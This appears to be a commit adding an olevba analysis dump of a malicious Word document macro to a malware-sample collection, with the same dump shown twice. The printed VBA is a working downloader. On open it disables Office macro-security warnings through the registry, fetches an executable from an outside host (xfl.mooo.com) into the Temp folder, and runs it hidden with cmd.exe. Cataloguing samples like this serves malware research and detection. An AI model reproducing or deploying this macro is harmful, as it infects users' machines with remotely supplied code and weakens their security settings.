JohnLaTwC · March 17, 2020 21:38
diff --git a/d4ce4fbd25c4541c08570b3a7bc9b781e3602ab22022c53a2c40428df1d1d9cc b/d4ce4fbd25c4541c08570b3a7bc9b781e3602ab22022c53a2c40428df1d1d9cc

 ## Uploaded by @JohnLaTwC
 ## Sample hash: d4ce4fbd25c4541c08570b3a7bc9b781e3602ab22022c53a2c40428df1d1d9cc / 5c2adb7b7d3c534be6f0bbc3750d7c8ea467f80816d4b35a284165c22fb7abdf

 olevba 0.55.1 on Python 3.7.3 - http://decalage.info/python/oletools
 ===============================================================================
 FILE: 5c2adb7b7d3c534be6f0bbc3750d7c8ea467f80816d4b35a284165c22fb7abdf
 Type: OLE
 -------------------------------------------------------------------------------
 VBA MACRO ThisDocument.cls 
 in file: 5c2adb7b7d3c534be6f0bbc3750d7c8ea467f80816d4b35a284165c22fb7abdf - OLE stream: 'VBA/ThisDocument'
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
 Dim CustomEvent As New EventClassModule

 Sub Register_Event_Handler()
 Set CustomEvent.App = Word.Application
 End Sub

 Private Sub Document_Open()
  Call Register_Event_Handler
 End Sub
 -------------------------------------------------------------------------------
 VBA MACRO EventClassModule.cls 
 in file: 5c2adb7b7d3c534be6f0bbc3750d7c8ea467f80816d4b35a284165c22fb7abdf - OLE stream: 'VBA/EventClassModule'
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
 Public WithEvents App As Word.Application
 Attribute App.VB_VarHelpID = -1
 Dim Closing As Boolean

 Private Sub App_DocumentOpen(ByVal Doc As Document)
  Application.DisplayAlerts = False
  Closing = False
  ActiveDocument.Content.Font.Hidden = False
  
  RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"
  
  Call MPS
 End Sub

 Private Sub App_DocumentBeforeSave(ByVal Doc As Document, SaveAsUI As Boolean, Cancel As Boolean)
  If Closing Then
    ActiveDocument.Content.Font.Hidden = True
  End If
 End Sub

 Private Sub App_DocumentBeforeClose(ByVal Doc As Document, Cancel As Boolean)
  Closing = True
 End Sub

 Sub RegKeySave(i_RegKey As String, i_Value As String, Optional i_Type As String = "REG_SZ")
 Dim myWS As Object
  Set myWS = CreateObject("WScript.Shell")
  myWS.RegWrite i_RegKey, i_Value, i_Type
 End Sub

 Sub MPS()
  Dim FS: Set FS = CreateObject("scripting.filesystemobject")
  TMP = Environ("Temp") & "\~$cache1.exe"
    
  If Not FS.FileExists(TMP) Then
    Call FDW
    If FS.FileExists(TMP) Then
      On Error Resume Next
      Shell "cmd.exe /c " + TMP, vbHide
    End If
  Else
    On Error Resume Next
    Shell "cmd.exe /c " + TMP, vbHide
  End If

 End Sub

 Sub FDW()
  Dim URL, TMP As String
  URL = "http://xfl.mooo.com"
  TMP = Environ("Temp") & "\~$cache1.exe"
  
  Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
  If WinHttpReq Is Nothing Then
    Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
  End If

  WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
  WinHttpReq.Option(6) = AllowRedirects
  WinHttpReq.Option(12) = True
  WinHttpReq.Open "GET", URL, False
  On Error Resume Next
  WinHttpReq.Send
  
  If Err.Number = 0 Then
    If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
      Set oStream = CreateObject("ADODB.Stream")
      oStream.Open
      oStream.Type = 1
      oStream.Write WinHttpReq.ResponseBody
      oStream.SaveToFile (TMP)
      oStream.Close
    End If
  End If
 End Sub

	## Uploaded by @JohnLaTwC
	## Sample hash: d4ce4fbd25c4541c08570b3a7bc9b781e3602ab22022c53a2c40428df1d1d9cc / 5c2adb7b7d3c534be6f0bbc3750d7c8ea467f80816d4b35a284165c22fb7abdf

	olevba 0.55.1 on Python 3.7.3 - http://decalage.info/python/oletools
	===============================================================================
	FILE: 5c2adb7b7d3c534be6f0bbc3750d7c8ea467f80816d4b35a284165c22fb7abdf
	Type: OLE
	-------------------------------------------------------------------------------
	VBA MACRO ThisDocument.cls
	in file: 5c2adb7b7d3c534be6f0bbc3750d7c8ea467f80816d4b35a284165c22fb7abdf - OLE stream: 'VBA/ThisDocument'
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
	Dim CustomEvent As New EventClassModule

	Sub Register_Event_Handler()
	Set CustomEvent.App = Word.Application
	End Sub

	Private Sub Document_Open()
	Call Register_Event_Handler
	End Sub
	-------------------------------------------------------------------------------
	VBA MACRO EventClassModule.cls
	in file: 5c2adb7b7d3c534be6f0bbc3750d7c8ea467f80816d4b35a284165c22fb7abdf - OLE stream: 'VBA/EventClassModule'
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
	Public WithEvents App As Word.Application
	Attribute App.VB_VarHelpID = -1
	Dim Closing As Boolean

	Private Sub App_DocumentOpen(ByVal Doc As Document)
	Application.DisplayAlerts = False
	Closing = False
	ActiveDocument.Content.Font.Hidden = False

	RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
	RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"

	Call MPS
	End Sub

	Private Sub App_DocumentBeforeSave(ByVal Doc As Document, SaveAsUI As Boolean, Cancel As Boolean)
	If Closing Then
	ActiveDocument.Content.Font.Hidden = True
	End If
	End Sub

	Private Sub App_DocumentBeforeClose(ByVal Doc As Document, Cancel As Boolean)
	Closing = True
	End Sub

	Sub RegKeySave(i_RegKey As String, i_Value As String, Optional i_Type As String = "REG_SZ")
	Dim myWS As Object
	Set myWS = CreateObject("WScript.Shell")
	myWS.RegWrite i_RegKey, i_Value, i_Type
	End Sub

	Sub MPS()
	Dim FS: Set FS = CreateObject("scripting.filesystemobject")
	TMP = Environ("Temp") & "\~$cache1.exe"

	If Not FS.FileExists(TMP) Then
	Call FDW
	If FS.FileExists(TMP) Then
	On Error Resume Next
	Shell "cmd.exe /c " + TMP, vbHide
	End If
	Else
	On Error Resume Next
	Shell "cmd.exe /c " + TMP, vbHide
	End If

	End Sub

	Sub FDW()
	Dim URL, TMP As String
	URL = "http://xfl.mooo.com"
	TMP = Environ("Temp") & "\~$cache1.exe"

	Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
	If WinHttpReq Is Nothing Then
	Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
	End If

	WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
	WinHttpReq.Option(6) = AllowRedirects
	WinHttpReq.Option(12) = True
	WinHttpReq.Open "GET", URL, False
	On Error Resume Next
	WinHttpReq.Send

	If Err.Number = 0 Then
	If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
	Set oStream = CreateObject("ADODB.Stream")
	oStream.Open
	oStream.Type = 1
	oStream.Write WinHttpReq.ResponseBody
	oStream.SaveToFile (TMP)
	oStream.Close
	End If
	End If
	End Sub